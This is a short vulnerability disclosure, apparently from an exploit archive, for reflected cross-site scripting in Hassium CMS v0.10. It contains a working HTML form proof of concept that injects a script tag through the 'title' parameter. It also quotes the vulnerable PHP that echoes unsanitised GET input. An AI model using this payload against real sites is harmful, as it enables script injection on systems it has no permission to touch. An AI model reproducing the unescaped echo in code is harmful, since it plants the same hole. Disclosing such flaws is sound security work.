*=============================================================|
| Exploit Title: Hassium CMS Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.hassium.org/index.php
|
| Download Link : https://github.com/hassiumsoft/hasscms-app/archive/master.zip
|
| Version : V 0.10
|
| Platform : PHP
|
| Tested on: Kali Linux
|
| Date: 1 /14 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
| <TITLE>Hassium CMS Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://Localhost/hasscms-app-master/themes/candidate/media/jackbox/modules/jackbox_social.php" method="get">
| <input type="hidden" name="title" value=""/><script>alert('M.R.S.L.Y')</script>">
|</form>
|</BODY>
|</HTML>
|
*=======================|
| vulnerability Method : GET
*=======================|
|Vulnerable code:
|
| <?php
|
| if (isset($_GET["title"])) {
|
| $title = $_GET["title"];
| print str_replace("{contentTitle}", $title, '<meta itemprop="name" content="{contentTitle}" />');
| }
|
| if (isset($_GET["poster"])) {
|
| $poster = $_GET["poster"];
| print str_replace("{imgPoster}", $poster, '<meta itemprop="image" content="{imgPoster}" />');
| }
|
| ?>
*=============================================================|
| Special Thanks To : Virangar , Ehsan Cod3r ، micle ، Und3rgr0und ، Amir.ght ،
| xenotix، modiret، V For Vendetta ، Alireza ، r4ouf ، Spoofer ،
| And All Of My Friends ، The Last One : My Self, M.R.S.L.Y
*=============================================================|